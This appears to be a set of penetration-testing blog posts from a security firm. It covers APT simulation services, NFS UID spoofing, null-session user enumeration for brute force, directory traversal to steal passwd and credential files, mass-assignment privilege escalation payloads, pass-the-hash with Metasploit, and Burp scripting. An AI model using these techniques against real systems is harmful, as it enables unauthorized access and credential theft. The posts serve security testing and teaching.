This subject is a bit more tricky, so let's approach it first with an example. Using HERMES, we analyzed some samples and activity from a group of APT actors that we call "UPS". The typical UPS attack performed the following activities (this information was compiled from IR activity and shared data from other victims):

Generate a particularly timed beacon that communicates over HTTP

Drop the command line Chinese language version of winrar on the target

Replace sticky keys with cmd.exe for persistence and access via RDP

Turn on RDP if it's not already enabled

Index and archive all office documents, compress and encrypt them with RAR and a specific password and store them in the recycle bin

Enable the support_388945a0 account and add it to the local admin group

Exfiltrate the data encoded over port 443 (but not SSL)

Setup an insecure service for persistence / privilege escalation

That is a fairly comprehensive list of attacker activity, and each action generates specific network traffic, log entries, or files on the target. So what we do with APTSim is take all the above information and create a piece of pseudo-malware that takes the same actions, except in a safe and controlled manner, and includes cleanup components so it can be removed when the exercise is complete.
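As an illustration of the "specific network traffic" point: a regularly timed beacon stands out because the jitter between its connections is abnormally low. Here is a small Ruby sketch of flagging that from a list of connection timestamps (the function name and threshold are my own illustration, not part of any AR tool):

```ruby
# Flag a host as beacon-like when the standard deviation of the gaps
# between its outbound connections is tiny, i.e. machine-timed.
def beacon_like?(timestamps, max_jitter: 2.0)
  return false if timestamps.size < 4          # too few samples to judge
  gaps = timestamps.each_cons(2).map { |a, b| b - a }
  mean = gaps.sum / gaps.size.to_f
  stddev = Math.sqrt(gaps.sum { |g| (g - mean)**2 } / gaps.size)
  stddev <= max_jitter
end
```

A beacon calling home every 60 seconds (timestamps 0, 60, 120, 180...) comes back true; ordinary browsing traffic, with wildly varying gaps, comes back false.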

Customers have different preferences as to how we take the next step but generally one of a few options is commonly used:

AR has VPN access to the customer network

AR has shipped a special box which the customer plugs into their network

AR conducts a physical penetration to launch the APTSim via a malicious USB key, custom developed Teensy, or other hardware implanted in customer equipment

AR generates a targeted phish mirroring the initial vector used by the original actors whether that's a malicious attachment or a URL, etc.

The customer executes the APTSim model themselves

The APTSim model then connects back to our command & control center, takes all the same actions as the real attacker, exfiltrates data, and then the customer is notified of what activity took place. The notification is a short document containing log entry examples, PCAP examples, times and dates, ports used; in short, everything that is needed to detect the activity as well as track it back post-event.

If the attack simulation is not detected, then AR will assist you in tuning your defenses, whether that means new rules for your Cisco ASAs, custom ClamAV or Snort signatures, specialized Splunk apps, etc.

Rather than a barely useful once-a-year event, this process is ongoing: monthly, or as new attacks are found and analyzed. When one of the organizations in your business sector is hit, within a very short period of time you know the crucial details of the attack, are tested to see if it could hit you as well, and finally are ready to defend before the attackers come for you. This is being proactive rather than reactive.

As a follow up to yesterday's post I would like to talk a bit more about HERMES and how it works.

INITIAL KNOWLEDGE - First, there is some form of information that comes in indicating a potential attack. This information usually has some trackable piece of data such as an email address, subject line, content, an md5 sum, etc. It usually arrives via one of the following methods:

Law enforcement notification

Incident Response/forensics post compromise information

A detection system picks up an attack (rare)

Specialized sourcing (AR gathers targeted attack tools, malware and other indicators using a variety of means including IR and direct sharing)

What's special about the above is that HERMES uses your standard build image rather than a generic XP VM, the way maliciousness is determined, and some of the memory work we do. Also, the fact that the AV scans (unlike sites such as VirusTotal, Jotti, etc.) do not submit your sensitive samples to AV vendors is fairly unique.

CORRELATION - Most organizations track incidents over time via a notebook, a wiki or, most commonly, a whiteboard. HERMES allows you to identify relationships between attacks over time:

Incident Tracking

Analyst Notes

Actor/attribution Information

Relations between IOCs on different samples or cases

There are several ways in which HERMES is already benefiting our clients and options how it may benefit you:

HERMES can be delivered as an appliance to supplement or provide your reverse engineering and incident tracking operations

HERMES can be delivered as an ESXi implementation which can fit easily into your existing virtualized environment

Finally, AR can provide organizations with HERMES targeted threat intel reporting, or HERMES can be operated by AR staff for you. Results can be provided as an XML feed, PDF, etc.

All of this information is fed into APTSim models to ensure that ongoing testing mirrors actual current targeted attack techniques and grows in sophistication over time, in sync with the attackers. This information is also used to generate your IDS, AV, Splunk and other defensive signatures.

Rather than focusing on the entire set of malware, for which there are millions upon millions of samples, HERMES focuses on a handful of sophisticated, targeted attack tools which have been in use over the last 30 days or less. Most security tools are designed to deal with the 80% of attacks such as botnets, scans, mass malware, etc. But it's the other 20% that you should care about, because those are the ones that are intentionally (and successfully) damaging your business and that you have no defense against. This is something you can get your hands around with a tool like HERMES.

In the next post I will talk a bit more about APTSim and how it works. As always, hit up info [at] attackresearch.com for more information.

V.

We all know by now that most of today's defenses are designed to defend against auditors and penetration testers. We also know that penetration tests do not reflect what today's attackers actually do.

AR has decided to try to address this problem and change the way active defense security is currently done. This diagram roughly represents the current process.

At each stage of the current process there is a problem.

* Vendor signatures are broad and cover millions of threats, exploits and malware, causing tons of false positives, and can only detect what is broadly "known".

* Penetration testing only occurs once or twice a year and is essentially patch verification at this point.

* Patching does nothing against 0days, configuration and design flaws or lateral attack with valid credentials.

* Real attacks are not being prevented or detected and few organizations have what's needed to address the problem once they have been compromised.

* Attackers change IPs constantly; it's a solved problem for them.

* Orgs are buying every tool out there but have no qualified staff to implement and maintain them.

Here is AR's proposed process:

NOTE: We must give a nod here to Mandiant and their IOC concept, which is brilliant.

In this process, HERMES covers the first three points. HERMES performs ongoing intelligence collection of APT tools and activities. It also conducts automated dynamic, static, network and forensic analysis, which in turn generates reports, indicators of compromise and defensive signatures. Unlike other products, HERMES can use your company's standard build image for dynamic testing, so you know exactly how the threat affects your environment rather than just a stock WinXP or Win7 image. HERMES replaces much of the expensive and time-consuming reverse engineering process. AR analysts then add in notes concerning actors, victim industries, targeted data, etc. Finally, HERMES' back-end big data system provides correlation, so you can see and track connections between the attacks, actors, malware and IPs of a year ago and the attacks of today.

Once the defenses for these highly tactical, targeted IOCs have been put into place, APTSim comes into play. AR takes the tools and techniques used by APT actors and creates custom applications that do exactly what they do. We SIMULATE the exact APT attack, seen elsewhere against your colleagues and competitors, in your environment to assure you don't fall victim to it as well. These tools are run on your network on an ongoing, subscription basis rather than as a monolithic once-a-year event. AR provides your security and IT staff with frequent, small 1-3 page APTSim notifications of what was done, when, how, how it should have been detected, and all the information necessary to detect it in the future if it wasn't.
This is in stark contrast to the 40-page "here is what isn't patched" reports that traditional penetration tests generate.

All of this means that your organization is in an ongoing, circular process of constantly being notified, defended and tested against up-to-the-minute APT attacks, rather than simply scanned and exploited for old memory corruption and XSS bugs. If you are an organization that has suffered losses from targeted attacks, is wrestling with staffing problems, and knows your expensive defenses have proven inadequate, this is what you have been looking for.

We are going to be releasing a few blog posts with our thoughts on why we have to better communicate what works in actually securing something! This first post is on why we created our new class, Offensive Techniques.

With all the "APT" hype, 0day discussions, and endless numbers of intrusions, we were having a hard time not screaming at the IT industry to pull its head out! Our good friend Dino Dai Zovi hit the nail on the head of why we created the Offensive Techniques class. He did this with a couple of tweets that read, "Oh, I see what you have been doing all of this time. Solving problems that don't exist while ignoring the real ones in front of your face," followed shortly by, "For example: defending against pen tests and security researchers instead of actual attacks and attackers. How's that working out for you?"

Countless times we have either conducted a test or incident response for a business that was decimated by some type of targeted attack. The techniques used, by either us or the attacker, are usually not what is being taught in traditional penetration testing classes in the industry. The attackers didn't run Nessus or some other vulnerability scanner. They usually didn't even have nmap (they used a batch file with a for loop and ping/netcat for a quick port scanner). The attacks combined deep operating-system-level knowledge to circumvent mis-configurations, some good custom tools, and even Metasploit! So why is it that, with the rise in IT security spending, we see little progression in defending against and detecting attacks that are not pulled off by a trained pen tester? It is because we don't train or watch for these types of attacks, and we never have. They have been going on for decades, not just the past 5 years or so. Take a look at the regulations on companies/organizations in relation to securing data.
The regulations are just a checkbox game, and the results of these regulations really don't improve security that much, if at all. You can implement everything from NIST 800-53 and we will still get in and wreak havoc! Organizations and companies are too bogged down with bureaucracy to adapt as fast as they need to. We have to change the cultural mindset of mid-to-senior level executives, politicians, and even some system administrators.

Offensive Techniques teaches how to really conduct offensive cyber operations, not auditor-based attacks. It is one of many Attack Research classes designed to help change how we go about providing organizations/companies with real threat-based/vulnerability-based results on how they are truly vulnerable. It teaches the fundamentals of how to conduct real attacks. We are debuting the class in October at Countermeasures 2012, but will be holding a class in the United States in November (more details to come on that). If you are interested in this or any of our other trainings, reach out and send us an email at training@attackresearch.com

The module is in the trunk and you can read the post, but in my experience newer versions of Lotus Domino don't actually advertise that they are Lotus Domino in the banner. Thus you need a way to identify these and, once identified, figure out the current version so you can see if there are any exploits for it.

One of the other things Bill mentions is locating these vulnerable pages. He uses Google dorks, which is useful as long as the site is indexed. While it's not in the trunk, a while back I had a bunch of Domino servers on a pentest. I ended up taking all the Domino scanners I could find, combining their wordlists into one, and writing a Metasploit module to search for those URLs. The key was that we wanted to see which ones were open to the world, which ones required authentication (correct behavior), and which ones forwarded you somewhere else (probably because you are on 80 and the site requires 443).

Open NFS mounts/shares are awesome. Talk about sometimes finding "The Goods". More than once an organization has been backing up everyone's home directories to an NFS share with bad permissions, so checking to see what's shared and what you can access is important.

Low? It's currently an "info" with Nessus 5. Anyway, you probably want to know about finding it. You have a few options.

To mount an NFS share, use the following after first creating a directory on your local machine:

[root@attacker~]# mount -t nfs 192.168.0.1:/export/home /tmp/badperms

Change directories to /tmp/badperms and you should see the contents of /export/home on 192.168.0.1. To abuse NFS you can check out the rest from http://www.vulnerabilityassessment.co.uk/nfs.htm; it talks about tricking NFS into thinking you are other users. I'm going to put it here in case it goes missing later:

"You ask now, how do you circumvent file permissions and the use of the sticky bit? This is done with a little prior planning and sleight of hand to confuse the remote machine.

If we have a /export/home/dave directory that we have gone into, we will see a number of files belonging to dave, some or all of which you may be able to read. The one thing the system will give you is the owner's UID on the remote system after issuing an ls -al command, i.e.

-rwxr----- 517 wheel 898 daves_secret_doc

The permissions at the moment do not let you do anything with the file as you are not the owner (yet) and not a member of the group wheel.

Move away from the mount point and unmount the share:

umount /local_dir

Create a user called dave:

useradd dave
passwd dave

Edit /etc/passwd and change the UID to 517

Remount the share as local root

Go into dave's directory:

cd dave

Issue the command:

su dave

As you are local root you can do this and as you have an account called dave you will not need a password

Now the quirky stuff. As the UID of your local account dave matches the username and UID of the remote one, the remote system now thinks you're its dave; hey presto, you can now do whatever you want with daves_secret_doc."

Valsmith and hdmoore gave their Tactical Exploitation talk at Defcon 15 and talked about NFS (file services section of the slides): video, white paper. They also gave it at Blackhat in a much longer format; unfortunately that video is broken into multiple 14-minute parts, so go Google for it (lazy).

The first post talks about executing shellcode and gives the calc.exe example. These examples work on x64 and x86. Yay! The second post talks about doing something more than calc.exe... getting shell, whooo hooooo.

You can review the code, but it only shows x86/32-bit shellcode. This will fail miserably on x64.

I initially thought it would be an easy fix: just grab an x64 payload from MSF. Problem is, there are no x64 http/https payloads...

CG was a sad panda.

This left me with two options:

Suck it up and use an existing x64 payload (like rev_tcp), or just pop calc.exe to prove how awesome I am during pentests

You will need to set the execution policy for v1.0 powershell, or possibly try a bypass technique.

I ended up adding this to Nicolas' code before it started doing its thing (line 24). It detects if the architecture is not x86 and just runs the shellcode with the x86 PowerShell. You'll have to set the execution policy for it first.

Null sessions are old school. They used to be useful against pretty much every host in a domain. Unfortunately, I very rarely run into an environment anymore where all workstations let you connect anonymously AND get data.

Where they can come in useful is:

Against mis-configured servers

Against domain controllers to pull info

Low? Actually a medium...

More than once I've had a PT where a master_browser was exposed to the Internet. We were able to connect to the server using rpcclient and enumerate users. After that we had a full list of the users in the domain to conduct external brute-force attacks with.

If you like pretty pictures, it kinda looks like this, there are command line utilities as well...

Cain uses null sessions by default to try to pull information. On modern systems this will fail.

But domain controllers/master_browsers do allow this, so if you find yourself in a position to speak with one you can get a list of users for the domain.

You can then take that list of users and run brute-force attacks against various services. I rarely fail to find at least one username/username pair in an environment.

Sometimes, even though the deployer functionality is password protected, the server-status may not be.

/web-console/status?full=true

/manager/status/all

LOW?

This can be useful to find:

Lists of applications

Recent URLs accessed

sometimes with sessionids

Find hidden services/apps

Enabled servlets

owned stuff :-)

Finding 0wned stuff is always fun, so let's see. Looking at the list of applications, one doesn't look normal (zecmd). Following that down leads us to zecmd.jsp, which is a JSP shell. If you are interested in zecmd.jsp and the JBoss worm it comes from, this is a good write-up, as is this OWASP preso: https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf

Thoughts?

-CG

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [1] Exposed Services and Admin Interfaces

Exposed Services:

An example of exposed services and making sure you check for default and common passwords: the first example is a VNC server with no password. This gives us a HIGH severity finding.

The following is a VNC server with a password of "password". See the problem? The same thing goes for SSH, Telnet, FTP, etc. Don't forget about databases as well: MS SQL, MySQL, Oracle, Postgres listening out to the Internet at large.

Admin Interfaces:

Admin interfaces can be gold. The problem is 1) you have to find them on the random-ass port they are running on and 2) you have to get eyes on them. This can be a hassle/problem/hard to do.

So, to bring the "low" to it: some random HTTP server gets you this in Nessus.

Now, to be fair, this could be totally accurate, but the point is you need to look at what is being served on this HTTP server. Could be something, could be nothing; no way to know unless you look. Finding useful HTTP pages on all the random ports can be challenging.

Here is a possible methodology for doing it:

Nmap your range

Import your nmap results into metasploit

Use the db_ searches to pull out a list of hosts & ports

With the magic of scripting languages make that list into an html page(s)

It kinda goes like this: after you have imported your nmap results, use the services option. If it's populated, you'll get a list of results like the below. Output that stuff to a CSV:

msf > services -o /tmp/demo.csv

Take that CSV and run some ruby on it

The above code will output an html file that you can open with Linky. Linky will open each link in a new tab, giving you a way to get eyes on each of those random HTTP(S) services. You can now start intelligently trying default passwords or viewing exposed content.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [0] Intro/The point of the talk (sorry no pics of msf or courier new font in this one):

I had several points (I think...maybe all the same point...whatever)

1. We tend to have an over-reliance on vulnerability scanners to tell us everything that is vulnerable. To be honest, I have been guilty of this myself; most of us probably have, for a variety of reasons: time, experience, level of effort required/paid for, etc. This over-reliance on scanners has led to "no highs" == "secure environment". Most of us know this is not *always* the case, and the point of the talk was to show some examples where medium and low vulnerabilities have led to further exploitation or impact that I would consider "high" or above. Whether you call them chained exploits, magic, or the natural evolution of taking multiple smaller vulnerabilities and turning them into a significant exploit or opportunity, it's becoming more normal/common to have to go this route.

2. Given the "no highs" == "secure environment" mentality, some clients have been conditioned to believe that anything that is not a high is not exploitable and therefore not a priority for fixing (sometimes ever). This of course is not the outcome most people would recommend. Nevertheless, some people take that approach.

3. How many IDS/IPS signatures exist for low and medium vulns, and how often do we ignore/disable those? Feedback welcome here.

4. Clients should pay attention to low/medium vulns as much as they do high+ vulns, and in turn pentesters/VA people/security teams should also pay attention to low/medium vulns. Does that mean every SSLv2-enabled finding should be a full-out emergency? Hell no, but *someone* needs to be able to vet that those low/medium findings can't be turned into something more.

5. Keep a human in the mix. Tools/scanners are great for automating tasks, but I don't think we are there yet with the technology of taking multiple less severe vulnerabilities and turning them into something significant. Bottom line: the scanner won't find all your ownable stuff; you need a person (or people) to do this.

In cktricky's last post he provided a great outline of the ins and outs of leveraging Burp's built-in support for directory traversal testing. There are two questions, however, that should immediately come to mind once you are familiar with this tool: how do I find directory traversal, and what should I look for if I do?

Finding directory traversal is the hunt for dynamic file retrieval or modification. The antonym, static file retrieval, is when the browser is delegated the request for a file on the server. In other words, every <a href>, CSS call for a file/location, and even most JavaScript calls can be considered static. You could copy the path of those requests into the browser address bar and grab the file yourself, because that is pretty much what the browser is doing for you. Dynamic file retrieval, however, is when you request a server-based page/function which serves you a file. Think of it as the difference between calling someone directly on the phone vs. calling an operator who calls that person and patches you in.

Dynamic file serving takes place for a variety of reasons, such as: user content download locations, dynamic image rendering/resizing features, template engines, language parameters*, AJAX-to-services type calls, sometimes in cookies, and occasionally in how pages themselves get served. These all basically look something like: somefunction.php?img=/some/place/graphic.jpg or somefunction.php?page=/view/something

The path to the file can either be relative (../../../etc) or, in some rarer cases, absolute (c:/windows/boot.ini). Additionally, these requests might be base64 or ROT13 encoded, or sometimes encrypted. Neither is a showstopper. You might think language parameters are an odd location for directory traversal, but after talking with my co-workers*, they reminded me about dynamic file modification. Some frameworks use parameters (such as language) to prefix a directory to the request or alter the file name for the appropriate language. Ergo:

Language, template/skin name, or occasionally environment-type variables (such as location=PROD, DEBUG, etc...). Anything that might be prefixed to a file name or directory to search is fair game for that.

Now what?

Once you've identified a location which appears to be ripe for testing, how do you verify, and what would you do? To verify, I have found two approaches that work well: default files and known files.

The first approach is based on looking for default files on the file system. Since you are mostly blind to what exists on a server, you look for the existence of these defaults to see if they can be retrieved. There are two resources which I've found helpful. The first is Mubix's list of post-exploitation commands. In addition to a helpful list of commands for post-exploit, the list includes very common files you might want to look for and steal (by operating system). The second resource is the Apache default layout per OS. This can be really useful if you are attacking a system running Apache, to grab known configurations. For non-Apache web servers, I usually install them locally and see what the default layout looks like manually.

The second approach comes into play if the first fails (and it might) because the user context of the site doesn't have the authority to access those files. So you have to request files you can be reasonably sure it has access to: the webpages it already serves. In this approach you attempt to serve other parts of the webpage, relative to the location you are currently looking at. As a contrived example, say you see a layout something like:

/mainpage.asp
/vulnerableFeature.asp?path=/images/some-image.jpg

you'd test for:

/vulnerableFeature.asp?path=../mainpage.asp
/vulnerableFeature.asp?path=/mainpage.asp

Since you know that the user context of the site has the authority to serve those pages, it -should- be a fairly practical way to verify if your directory traversal is working. You may even get back source code this way. :-)

If you are attempting to take over the server, you should be looking to steal resources which would help you with that (such as the passwd & SAM files).
If you are attempting to do an involuntary code review, you should steal the source code from the pages you are looking at. You'll occasionally find hard-coded credentials in source, but application configuration files are often gold for credentials. I've found database users, admin users, SMTP credentials and FTP users this way.
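To make the known-files check concrete, here's a small Ruby sketch that builds the candidate traversal requests from a page you already know the site serves. The endpoint and page names are just the contrived example from above, not a real API:

```ruby
# Hypothetical helper: given the vulnerable endpoint and a page the site is
# known to serve, build the traversal URLs to try. Both a relative ("../")
# and an absolute-style path are worth testing.
def traversal_candidates(vuln_url, known_page)
  [
    "#{vuln_url}?path=../#{known_page.sub(%r{\A/}, '')}",  # relative traversal
    "#{vuln_url}?path=#{known_page}"                       # absolute-style path
  ]
end

traversal_candidates('/vulnerableFeature.asp', '/mainpage.asp').each { |u| puts u }
```

If either request comes back with the page (or its source), the parameter is traversable.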

Some final things to consider:

Most operating systems support the use of environment variables/shortcuts for locations such as %home% or ~. This is useful to remember if there are protections against using a period or two successive periods.

When dynamic features serve files, they often violate other protections. In IIS, for instance, various extensions cannot be served by the server (.config files, for example). However, in most directory traversals you can pull the web.config file out without many problems.

User-controlled uploads often get served dynamically because there isn't a way for the server to know beforehand what the files are. You can sometimes find directory traversal here by uploading files with weird paths in their names (or renaming them after upload).

Developers sometimes leave clues to files' physical locations in comments. I once downloaded the source for an entire site because of this.

Often, I'll use Burp Suite's directory traversal Intruder payload list. There is one step you must perform first to leverage the traversal payloads effectively; we'll briefly cover it.

Intruder with the insertion point (fuzzing the file parameter)

Burp's fuzzing-path traversal payload list, available under the preset-list payload set, has a placeholder representing the filename you'd like to fuzz for. This placeholder, "{FILE}", must be substituted with an actual filename (e.g. /etc/passwd).

As you can see, the additional step was adding a payload processing rule. We chose match/replace, escaped the characters that have regular-expression meaning (the curly braces {}) by placing a backslash in front of them, and replaced the placeholder with etc/passwd.

Lastly, don't forget to select/deselect the URL-encoding of characters based on your needs.
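Conceptually, the payload-processing rule is just a regex substitution over every payload in the list. A sketch of the equivalent transformation (the sample payloads are illustrative, not Burp's actual list):

```ruby
# Each payload in the traversal list carries a "{FILE}" placeholder; the
# match/replace rule (with the curly braces escaped) swaps in the target file.
payloads  = ['../{FILE}', '..%2f..%2f{FILE}', '/%2e%2e/{FILE}']
processed = payloads.map { |p| p.gsub(/\{FILE\}/, 'etc/passwd') }
processed.each { |p| puts p }
```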

I ended up having to use the smb/upload_file module on a pentest. I was able to get the local admin hashes, but for some reason the psexec module wouldn't get code execution; it would act like it was working but wasn't. So we decided to push a binary and use a winexe modified to pass the hash to exec the binary as needed. It went something like this...

##################################################
# add a route to the 10.x network thru session 1
##################################################

#######################################################
# psexec wouldnt work. AV eating metsvc most likely...
# used smb/upload_file to place a binary on the box
#######################################################

msf exploit(handler) > use auxiliary/admin/smb/upload_file
msf auxiliary(upload_file) > info

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
LPATH                      yes       The path of the local file to upload
RHOST                      yes       The target address
RPATH                      yes       The name of the remote file relative to the share
RPORT     445              yes       Set the SMB service port
SMBSHARE  C$               yes       The name of a writeable share on the server

Description: This module uploads a file to a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features of the Metasploit Framework that you need, like pass-the-hash authentication.

####################################################################
# Use winexe with pass the hash to get cmd shell and run the binary
####################################################################

Over the last two cycles of the OWASP Top 10, insecure direct object reference has been included as a major security risk. An object reference is exposed, and people can manipulate it to access other objects they aren't supposed to. But an apparently lesser-known problem is when the object itself is directly exposed. This happens when an application maps user-controlled form data directly to an object's properties without validation.

Perhaps this issue gets less press because every language calls it something different. In Ruby, people call this mass assignment. In .NET and Java it's often referred to as reflection binding. Regardless of the name, it is how the object obtains its data that is of concern.

In ruby, vulnerable code might look like this:

@foo = Foo.new(params[:foo])

The params call wants to make life easy and will automagically map any form data that matches the object’s parameters for you—unless you say otherwise. This is a very common convention used in MVC frameworks, because manually mapping a form POST to an object is annoying. The problem here is that it makes no difference to the controller whether you’ve exposed that field in the presentation layer. It just has to exist on the object.

In other words, if you were updating a product quantity in your shopping cart, you might be able to change the price by guessing that a price field exists. Just add a price field to your POST parameters and it might override the value. This approach can be effective, but it is mostly a guessing game at that point. Some frameworks let you throw tons of arbitrary data at them and whatever sticks, sticks. Others will barf on invalid parameters.
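A minimal Ruby sketch of the problem (CartItem and its fields are hypothetical; real MVC frameworks do this mapping for you):

```ruby
# A model that, like pre-whitelist MVC binders, blindly copies every
# submitted key onto a matching attribute.
class CartItem
  attr_accessor :quantity, :price

  def initialize(params = {})
    # No whitelist: any key that matches a setter gets assigned.
    params.each { |k, v| send("#{k}=", v) }
  end
end

# The form only exposes quantity, but an attacker adds price to the POST:
item = CartItem.new('quantity' => 3, 'price' => 0.01)
puts item.price
```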

There is a second route, however, which is why this vulnerability deserves more attention. When I said that you are allowed to map to anything on the object, I meant it. You can map complex objects to other complex objects, as long as they relate to each other. Let's look at an example in C#:

Behind the scenes, the framework maps all of the form data directly into the foo object. Developers also sometimes do this directly by calling the UpdateModel() function. In either usage, if someone sent a malicious POST to the “Create” view:

Foo.Bar.name="hello"&Foo.Bar.is_admin=true&Foo.name="myfoo"

You’d end up with a full fleshed out object where:

Foo.name = "myfoo"
Foo.Bar.name = "hello"
Foo.Bar.is_admin = true

The Bar object is instantiated automatically through its empty constructor, and its properties are mapped as well. Any reference the exposed object has, you can bind to. This also works for arrays of simple or complex types. If instead of a single instance you had an array or List<Bar>, you would just do the following:

Foo.Bar[0].name="hello"&Foo.Bar[0].is_admin=true

Without any other validations, this is all kosher.

In the wild I've used this attack to escalate privileges by updating my profile and walking down to a permissions table. I've also run across places where you could register every user for an event, and another instance where you could take over other people's blog posts simply by editing your own profile.

If you search for this during tests, here are some key things I’ve learned:

This vulnerability is best identified with access to source code—and very few developers seem to protect against it.

When reviewing code, pay attention to how the constructor works and how fields are set on the object. Some properties are set via functions and you can’t bind them directly. Other objects don’t have empty constructors. This causes the attack to fail.

I frequently find this vulnerability on “update” and “create” controller actions.

You can find this without source (and I have); it's just harder. You do so by creating a loose type map through browsing the site.

You can create a type map by following a process like this:

Go to the object's "create" page and note all the form fields there. That is your basic "object". As you see these objects in other places on the site, they may reveal more about their structure.

The site will guide you in what you need to know about object relationships. If you are looking at your cart, and it has a list of products & their details-- the cart object has a list of products.

For everything else, there are common object relationships you can just assert. Carts do generally have products, just as people generally have permissions. Take some time and look over common object models on the interwebs.

This attack route exists on pretty much every MVC-based framework. In particular, Spring, Struts, MVC.Net and Ruby on Rails are all vulnerable. Maybe others are too, but those are so popular that I've not looked much deeper into it.

It is true that developers can prevent this by whitelisting specific fields to bind, but they don't. The whole point of the convenience functions is convenience. If you've built an MVC application and didn't go out of your way to protect against this, you are most likely vulnerable to it.
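The whitelisting defense boils down to copying only the fields you explicitly permit before they ever reach the binder. A hedged sketch of the idea (this is the concept behind Rails' attr_accessible whitelist, not its actual implementation; the field names are illustrative):

```ruby
# Only explicitly allowed fields survive; everything else is dropped.
ALLOWED_FIELDS = %w[quantity].freeze

def safe_attributes(params)
  params.select { |k, _| ALLOWED_FIELDS.include?(k) }
end

puts safe_attributes('quantity' => 3, 'price' => 0.01).inspect
```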

In this portion of the Buby Script Basics series (Part 5), we will cover all but two of the remaining methods (methods without lines through them) on our checklist.

As always, you can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

The three methods we will cover are issueAlert, sendToIntruder, and sendToRepeater. The example script is called sendto_and_issue_alert.rb and encompasses all three.

The purpose of this script is to check the body of POST messages to see if one of the parameters matches our list of interesting parameters (FUZZ_PARAMS) which deserve manual analysis. We'll perform the manual analysis with Intruder/Repeater and then issue an alert when the request has been sent over.

Unlike the previous tutorials, this script will be run by invoking the method via the command line.

Example of how to run this script (covered in Part 1 of this series):

$ jruby -S buby -i -B burp_pro.jar -r sendto_and_issue_alert.rb

This script is run against the proxy history: it searches the proxy history looking for interesting requests. After you've interacted with the site, type "$burp.run".

If the parameters in the body of the POST message match our interesting params, you should see the following:

Request sent to repeater, notice the name of the tab (it is our fuzz param "Price")

The request has been sent to intruder

Lastly, an alert will appear notifying you that the previously mentioned actions have been taken.

Time to discuss the code that does all this. :-)

First we establish parameters that could be interesting to us in terms of performing manual analysis.

The method '$burp.run' is the catalyst for everything that comes next. When the user types $burp.run at the console they are invoking this method. Line 2 instantiates the proxy_hist object ($burp.get_proxy_history). The fourth line determines if its length is greater than 0. If so, we start iterating thru each obj in the get_proxy_history array. Line 7 invokes the hmeth method (passing it the 'obj' object). Line 8 calls extract_str with the result of Line 7 (hmeth, which is the HTTP method) and the 'obj' object.

The req_meth method takes the request_headers, takes the first line, and converts it to a string. The '[0..3]' slice extracts the first four characters of that line. The method returns this value.
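A sketch of that logic (method and argument names follow the walkthrough; the sample headers are illustrative):

```ruby
# Take the first request-header line and keep its first four characters,
# which is enough to distinguish POST from everything else.
def req_meth(request_headers)
  request_headers.first.to_s[0..3]
end

puts req_meth(['POST /login HTTP/1.1', 'Host: example.com'])
```

Note that for GET this yields "GET " with a trailing space, which is fine here since the script only compares against POST.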

Part 1 of extract_str

The extract_str method is where the FUZZ_PARAMS are searched against the request message and sent to repeater/intruder (along with the alert). The second line splits objs into the http_meth and req objects. The third line ensures that we do not execute any further code unless the http_meth is a POST. Then we instantiate the bparams object as a Hash on line 4.

On line 5, the request_body gets split on the ampersand, so that we break up all the params and their values into key/value pairs (ex: Price=2099.00). Next, we split these pairs on the '=' (equals sign) and place each param/value (key/value) into the bparam hash. Conceptually the bparam hash would look like:

bparam = {'Price' => '2099.00'}

The last line assigns either true or false to the proto object based on whether or not the protocol is https.

Part 2 of extract_str

Here we begin iterating thru each item in the FUZZ_PARAM array. If the bparam hash has a key which matches one of the items in FUZZ_PARAM, we send it to intruder/repeater and issue our alerts.

Explanation of methods:
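The body parsing described above can be sketched in a few lines (the sample body is illustrative):

```ruby
# Split the POST body on '&', then each pair on '=', building a hash of
# parameter names to values -- conceptually the bparam hash.
def body_params(request_body)
  request_body.split('&').each_with_object({}) do |pair, h|
    key, value = pair.split('=')
    h[key] = value
  end
end

puts body_params('Price=2099.00&Qty=1').inspect
```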

The code here is nothing more than two arrays. The first array, EXCLUSION_LIST, contains items we'd like to exclude from scope. The second array, INCLUSION_LIST, contains items to include.

The following portion of code contains a PREFIX array (both http and https). While iterating through this prefix array, we iterate through a second list (EXCLUSION_LIST), concatenating the prefix + host + the item in the EXCLUSION_LIST. This step is repeated for the INCLUSION_LIST. The $burp.includeInScope() method is then called and we submit the concatenated value (url) to it.
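The nested iteration reduces to building prefix + host + path for every list entry; in the real script each resulting URL is handed to $burp.includeInScope(). A sketch with illustrative values:

```ruby
PREFIXES       = %w[http:// https://].freeze
INCLUSION_LIST = %w[/admin /login].freeze
host           = 'www.example.com'

# For each protocol prefix, concatenate prefix + host + path.
urls = PREFIXES.flat_map do |pre|
  INCLUSION_LIST.map { |path| "#{pre}#{host}#{path}" }
end
urls.each { |u| puts u }
```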

do_active_scan, do_passive_scan, isInScope

----------------------------------------------------

The def $burp.evt_proxy_message is a familiar one at this point in the series, so we won't discuss it in detail. The code @@msg = nil exists solely to instantiate the @@msg class variable. We need to keep an object associated with the request message (headers/body) because passive scanning requires both a request message and a response message.

pre = is_https ? 'https' : 'http' is just a way to define the "pre" object based on whether it is an http or https message.

pre_bool does the same thing as the pre object, but instead of http/https it is true/false.

uri = "#{pre}://#{rhost}:#{rport}#{url}" is just the url (string concatenation).
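Those three assignments, with sample values filled in:

```ruby
# Illustrative inputs standing in for evt_proxy_message's arguments.
is_https = true
rhost, rport, url = 'www.example.com', 443, '/login'

pre      = is_https ? 'https' : 'http'      # protocol as a string
pre_bool = is_https ? true : false          # same test, boolean form
uri      = "#{pre}://#{rhost}:#{rport}#{url}"

puts uri
```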

The last three lines of code basically set the @@msg value. We only want to do this if the message is a request. Remember, we need an object to hold the request message so that even when the current message is a response we can reference both the request and the response.

The next bit of code basically says: if this message is in scope AND is a request message, start an active scan. Otherwise, if it is an in-scope response message, perform passive scanning.
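That dispatch can be sketched as follows. The burp object and its in_scope?/do_active_scan/do_passive_scan calls stand in for Buby's real API here, and cached_req plays the role of @@msg:

```ruby
# In-scope requests get an active scan; in-scope responses get a passive
# scan that pairs the cached request with the current response.
def dispatch(burp, uri, is_req, rhost, rport, pre_bool, msg, cached_req)
  return :skipped unless burp.in_scope?(uri)

  if is_req
    burp.do_active_scan(rhost, rport, pre_bool, msg)
    :active
  else
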